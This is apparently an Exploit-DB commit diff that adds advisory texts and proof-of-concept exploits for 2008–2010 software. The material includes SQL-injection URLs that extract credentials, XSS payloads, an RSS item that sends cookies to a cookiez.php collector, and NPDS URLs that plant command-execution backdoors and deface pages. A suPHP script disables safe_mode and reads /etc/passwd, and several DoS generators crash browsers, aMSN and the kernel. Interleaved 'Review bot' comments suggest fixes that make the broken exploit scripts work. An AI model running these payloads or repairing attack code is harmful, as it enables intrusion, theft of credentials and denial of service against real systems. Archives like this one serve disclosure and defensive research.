Updated 04_05_2014

This commit is contained in:
Offensive Security 2014-04-05 04:32:30 +00:00
parent d39d09c4d0
commit 1375f95446
24 changed files with 898 additions and 54 deletions


@ -29420,7 +29420,6 @@ id,file,description,date,author,platform,type,port
32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0
32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
@ -29436,3 +29435,25 @@ id,file,description,date,author,platform,type,port
32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0
32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0
32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0
32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection Vulnerability",2008-12-19,"Moritz Naumann",php,webapps,0
32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 'group-summary.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 'user-properties.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 'log.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0
32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0
32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x 'qdisc_run()' Local Denial of Service Vulnerability",2008-12-23,"Herbert Xu",linux,dos,0
32683,platforms/asp/webapps/32683.txt,"Mavi Emlak 'newDetail.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0
32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 WAV File Parsing Code Execution Vulnerability",2008-12-29,anonymous,windows,remote,0
32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0
32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0
32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0
32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0
32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0
32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0
32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0
32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0
32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0
32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0
32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0
32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0
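Review bot: The 32659 row in the first hunk (`32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",...`) still reads as a live index entry, while this same commit deletes platforms/hardware/webapps/32659.txt outright (its section shows `-1,53 +0,0`). The rendered page has lost the +/- markers, so I cannot tell whether that row is the single line this hunk removes (`-29420,7 +29420,6`); if it is not, files.csv now points at a file that no longer exists. Worth confirming against the raw diff.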



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33041/info
Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33045/info
Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/33072/info
Symbian S60 is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to prevent users from sending or receiving SMS or MMS messages.
This issue affects handsets using Symbian S60.
The following example message is available:
"123456789@123456789.1234567890123 "


@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/32975/info
COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities:
- Multiple unauthorized-access vulnerabilities
- An information-disclosure vulnerability
- Multiple cross-site scripting vulnerabilities
- A denial-of-service vulnerability
- Multiple buffer-overflow vulnerabilities
Attackers can exploit these issues to compromise the affected device, obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
The following firmware versions are vulnerable; additional versions may also be affected:
CT-536 A101-302JAZ-C01_R05
HG-536+ A101-302JAZ-C01_R05 and A101-302JAZ-C03_R14.A2pB021g.d15h
http://www.example.com/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http://www,example.com/password.html


@ -1,53 +0,0 @@
Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability
Google dork : N/A
Date : 02/04/2014
Exploit Author : Blessen Thomas
Vendor Homepage : http://www.icommtele.com/
Software Link : N/A
Version : ICOMM 610
Tested on : Device software version 01.01.08.991 (10/01/2010)
Type of Application : Modem Web Application
CVE : N/A
Cross Site Request Forgery
It was observed that this modem's Web Application , suffers from Cross-site
request forgery through which attacker can manipulate user data via sending
him malicious craft url.
At attacker could change the password of the victim's account without the
victim's knowledge as the
application is not having a security token implemented.
The Modem's application is not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password: In the POC the IP address in the POST is the modems IP
address.
<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32937/info
Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32938/info
Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/user-properties.jsp?username=%3C[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32940/info
Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32945/info
Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Openfire 3.6.2 is vulnerable; prior versions may also be affected.
http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup

64
platforms/linux/dos/32682.c Executable file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/32985/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users.
Versions prior to Linux kernel 2.6.25 are vulnerable.
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#define MAXTASKS 200
int main(int argc, char *argv[])
{
int i;
char cmd[128];
FILE *f;
pid_t pids[MAXTASKS];
pid_t pid;
unsigned int num;
if (argc < 3) {
printf("enter netserver hostname as the first parameter\n");
printf("enter number of netperf tasks as the second parameter\n");
return 1;
}
f = fopen("/dev/null", "w");
if (!f) {
printf("cannot open /dev/nu;;\n");
return 2;
}
sprintf(cmd, "netperf -H %s -l 60 -t UDP_STREAM -- -s 262144 -r 262144 -m 16384", argv[1]);
num = atoi(argv[2]);
if (num > MAXTASKS) {
printf("number of tasks is too high, resetting to %ld\n", MAXTASKS);
num = MAXTASKS;
}
for(i = 0; i < num; i++) {
pid = fork();
if (pid == 0) {
fclose(stdout);
fclose(stderr);
stdout = f;
stderr = f;
execl("/bin/sh", "/bin/sh", "-c", cmd, NULL);
}
else {
printf("newpid: %d\n", pid);
pids[i] = pid;
}
}
for(i = 0; i < num; i++) {
waitpid(pids[i], NULL, 0);
}
fclose(f);
return 0;
}
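Review bot: `num = atoi(argv[2]);` calls atoi without `#include <stdlib.h>`, and the reset message passes the int constant MAXTASKS to a `%ld` conversion; add the include and change the format to `%d`. The `sprintf(cmd, ...)` into the 128-byte `cmd` puts no bound on argv[1], so an over-long hostname overruns the buffer — use `snprintf(cmd, sizeof cmd, ...)`. A child whose `execl` fails also falls through into the parent's fork loop instead of stopping; add `_exit(127);` directly after the `execl` line.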

15
platforms/linux/dos/32696.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/33085/info
KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or cause the affected browser to crash.
KDE Konqueror 4.1 is vulnerable; other versions may also be affected.
applications:/<a href="javascript:alert(1)">Here</a>
trash:/<a href="javascript:alert(1)">Here</a>
remote:/<a href="javascript:alert(1)">Here</a>
applications:/<font size="8">THE GAME</font>
applications:/<iframe src="http://milw0rm.com">
remote://crash:konqueror@
applications://crash:konqueror@

55
platforms/linux/dos/32697.pl Executable file

@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/33096/info
aMSN is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.ctt' file.
Successfully exploiting this issue will cause the application to crash, denying service to legitimate users. Attackers may also be able to run arbitrary code, but this has not been confirmed.
#!usr/bin/perl
#Description : download The Program and run the
PoC and go to aMSN messenger and go to Contacts / Load Contact List /
Choose Hakxer File
# The Program Get Disconnect from Server
# thx to allah [ Proud To Be A Muslim ]
# EgY Coders Vulnerability Researcher Team
print "************************************************************************
*** Discovered & Written By : Hakxer [Egy Coders Team]
*** Program / bug : aMSN [CTT File] Denial Of Service
*** program site : http://www.amsn-project.net/
*** Greetz to : Allah , EgY Coders Team , All My Friends
**************************************************************************"
my $code='<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</contact>
</contactlist>
</service>
</messenger>';
open (MYFILE,'>>hakxer.ctt');
print MYFILE $code;
close(MYFILE);
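Review bot: The script as committed does not parse: the two description lines after `#Description : download The Program and run the` (`PoC and go to aMSN messenger ...` and `Choose Hakxer File`) have no `#`, so perl reads them as code, and the shebang `#!usr/bin/perl` is missing its leading slash. Prefix both lines with `#` and make the shebang `#!/usr/bin/perl`. `open (MYFILE,'>>hakxer.ctt')` is also unchecked and opens in append mode, so a second run appends a second XML document to the same file; `open(MYFILE, '>', 'hakxer.ctt') or die "hakxer.ctt: $!";` would be the usual form.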


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/33060/info
The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.
Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.
The issue affects xterm with patch 237; other versions may also be affected.
The following example is available:
perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log


@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/33044/info
MagpieRSS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
MagpieRSS 0.72 is vulnerable; other versions may also be affected.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA["><iframe src="javascript:window.location=&#039;http://www.example.com/cookiez.php?c=&#039;+document.cookie"></iframe><a lol="]]></title>
<description>XSS test</description>
<item>
<title><![CDATA[z0mG?!]]></title>
<link><![CDATA[what teh hax?!]]></link>
<description>
<![CDATA[
"><iframe src="javascript:alert(/xss/)"></iframe>
]]>
</description>
</item>
</channel>
</rss>

39
platforms/osx/dos/32694.pl Executable file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_ENOUGH_MEMORY
# Memory leaks are common in browsers.. tested on Vista SP1
# Compliments of bf2
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n";
}
$head = "<html>" . "\n";
$trig = "<body alink=\"" . "A/" x 10000000 . "\">" . "\n";
$foot = "</html>";
$data = $head . $trig . $foot;
open(FILE, '>' . $filename);
print FILE $data;
close(FILE);
exit;
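Review bot: The usage branch `if(!defined($filename))` prints the message but does not exit, so the script carries on and `open(FILE, '>' . $filename)` is reached with an undefined name (effectively an empty filename, with a warning under `-w`). Add `exit 1;` inside that branch. The `open` result is also unchecked; `open(FILE, '>', $filename) or die "$filename: $!";` would surface a write failure instead of silently producing nothing.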

55
platforms/osx/dos/32695.php Executable file

@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
<?php
# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following code is a proof of concept for a crash vulnerability that exists in 'Apple iPhone MobileSafari'.
# Point your browser to the created(crash.html) file and see what happen ;)
# The vulnerable tag is:
# * <body alink="A x 12000085">
# -----------------------------------
# Exploit Title: Apple iPhone Safari (body alink) Remote Crash
# Date: 19/12/2010
# Author: Pr0T3cT10n
# Affected Version: IOS 4.0.1
# Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari
# Launch Safari, point your browser to the page and safari will crash.
# ISRAEL, NULLBYTE.ORG.IL
$string = str_repeat('A', 12000085);
$code = "<html>
<head>
<title>Apple iPhone Safari (body alink) Remote Crash</title>
</head>
<body alink='{$string}'>
</body>
</html>";
if(file_put_contents("./crash.html", $code)) {
echo("Point your safari mobile browser to `crash.html`.\r\n");
} else {
echo("Cannot create file.\r\n");
}
?>

70
platforms/php/local/32693.php Executable file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/33073/info
suPHP is prone to a 'safe_mode' restriction-bypass vulnerability.
Successful exploits may allow attackers to bypass arbitrary PHP configuration options, including the 'safe_mode' setting.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' restrictions assumed to isolate the users from each other.
<?
/*
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit
Author : Mr.SaFa7
Home : v4-team.com
note : this exploit for education :)
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[+] evil files created succes ! \n";
}
else{
echo "[-] access denial ! \n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini writed \n";
}
else{
echo "[-] 404 php.ini not found !\n";
}
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "[+] evil .htaccess writed\n";
echo "[+] exploited by success!\n\n\n";
echo "\t\t\t[+] discouvred by Mr.SaFa7\n";
echo "\t\t\t[+] home : v4-team.com\n";
echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n";
}
else{
echo "[-] evil .htaccess Not found!\n";
}
system("pwd;ls -lia;uname -a;cat /etc/passwd");
#EOF
?>
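Review bot: The file opens with the short tag `<?`, which is only honoured when `short_open_tag` is enabled; with it off the whole script is emitted as plain text, so `<?php` is the portable form. The checks `if($bypfile and $stuffile!= NULL)` and `if($dj and $dj1!= NULL)` bind as `$bypfile and ($stuffile != NULL)` because `and` has lower precedence than `!=`; the result happens to be the same here, but `if ($bypfile !== false && $stuffile !== false)` says what is meant. In both cases the else branch only prints and execution continues into `fwrite` on a possibly-false handle, so an `exit` in each else branch would keep the later status messages honest.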

15
platforms/php/webapps/32676.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/32934/info
PECL Alternative PHP Cache is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Alternative PHP Cache 3.1.1 and 3.0.19 are vulnerable; other versions may also be affected.
A malicious user with local write access (such as an FTP user on shared
hosting environments) may create two directories
</
a><script>alert("XSS")</
and create a file named
script>.php
in the latter directory, then access this file via HTTP.

14
platforms/php/webapps/32685.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/33043/info
ViArt Shop is prone to multiple remote vulnerabilities:
- Multiple cross-site scripting vulnerabilities
- An information-disclosure vulnerability
- An authentication-bypass vulnerability
An attacker can exploit these issues to execute arbitrary script code, steal cookie-based authentication credentials, obtain sensitive information, or gain unauthorized access to the affected application.
ViArt Shop 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/manuals_search.php?manuals_search=<html><script>window.location="http://www.example2.com";</script></html>

304
platforms/php/webapps/32689.txt Executable file

@ -0,0 +1,304 @@
source: http://www.securityfocus.com/bid/33051/info
NPDS is prone to multiple input-validation vulnerabilities:
- Multiple local file-include vulnerabilities
- An HTML-injection vulnerability
- Multiple SQL-injection vulnerabilities
- Multiple cross-site scripting vulnerabilities
Exploiting these issues can allow an attacker to steal cookie-based authentication credentials, view and execute arbitrary local files within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Versions prior to NPDS 08.06 are vulnerable.
http:/www.example.com/npds/modules/annonces/config.php?admin=1&tit=";%0Apassthru(stripslashes(urldecode($_GET[&#039;cmd&#039;])));%0Aecho%20"
/npds/modules/annonces/config.php
Create backdoor and/or inject code into connect.inc.php file
BACKDOOR PHP
http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../test.php%00&lastfm_username=";%0Asystem($_GET[&#039;dir&#039;]);%0Aecho%20"
DEFACE
http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../index.html%00&lastfm_username=";%0APHP?><html><big><big>OWNED%20BY%20NOSP
!!!</big></big></html><?php
/npds/modules/last-fm/admin/adm_save.php
Create backdoor and/or inject code into security.log file
<form name="fileU" method="post" enctype="multipart/form-data" action="http:/www.example.com/npds/modules/upload/upload.php">Fichier : <input
class="TEXTBOX_STANDARD" type="file" name="file1" size="50" maxlength="255">
<input class="TEXTBOX_STANDARD" type="submit" value="OK">
<input type="hidden" name="MAX_FILE_SIZE" value="200000">
<input type="hidden" name="op" value="upload">
<input type="hidden" name="numero" value="0">
<input type="hidden" name="ficname" value="test.txt">
<input type="hidden" name="name_tmp" value="<? phpinfo(); ?>">
</form>
/npds/modules/upload/upload.php
Create backdoor and/or inject code into security.log file
http:/www.example.com/npds/footer.php?Default_Theme=../logs\security.log%00
/npds/footer.php
Include
http:/www.example.com/npds/modules/annonces/affi_ann.php?ModPath=../../logs/security.log%00
/npds/modules/annonces/affi_ann.php
Include
http:/www.example.com/npds/modules/annonces/affi_img.php?ModPath=../../logs/security.log%00
/npds/modules/annonces/affi_img.php
Include
http:/www.example.com/npds/modules/affiche.php?ModPath=../../logs/security.log%00
/npds/modules/annonces/affiche.php
Include
http:/www.example.com/npds/modules/annul.php?ModPath=../../logs/security.log%00&
/npds/modules/annul.php
Include
http:/www.example.com//npds/modules/block_partenaires.php?language=../../../../../../logs/security.log%00
/npds/modules/block_partenaires.php
Include
http:/www.example.com/npds/modules/chargement.php?ModPath=../../logs/security.log%00
/npds/modules/chargement.php
Include
\
http:/www.example.com/npds/modules/deezer/admin/index.php?ModPath=../../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/deezer/admin/index.php?language=../../../../../../logs/security.log%00
/npds/modules/deezer/admin/index.php
Include
http:/www.example.com/npds/modules/deezer/deezer.php?language=../../../../../logs/security.log%00
/npds/modules/deezer/deezer.php
Include
http:/www.example.com/npds/modules/deezer/deezermod.php?language=../../../../logs/security.log%00
/npds/modules/deezer/deezermod.php
Include
http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../../../logs/security.log%00
/npds/modules/G-annonces/admin/adm_ann.php
Include
http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../logs/security.log%00
/npds/modules/G-annonces/admin/index.php
Include
http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00
/npds/modules/G-annonces/annonce_form.php
Include
http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/index.php
Include
http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/list_ann.php
Include
http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/modif_ann.php
Include
http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../../../logs/security.log%00
/npds/modules/G-annonces/search.php
Include
http:/www.example.com/npds/modules/GS-annonces/print.php?ModPath=../../../logs/security.log%00
/npds/modules/GS-annonces/print.php
Include
http:/www.example.com/npds/modules/last-fm/admin/adm.php?ModPath=../../../../logs/security.log%00 OU
http:/www.example.com/npds/modules/last-fm/admin/adm.php?language=../../../../../logs/security.log%00
/npds/modules/last-fm/admin/adm.php
Include
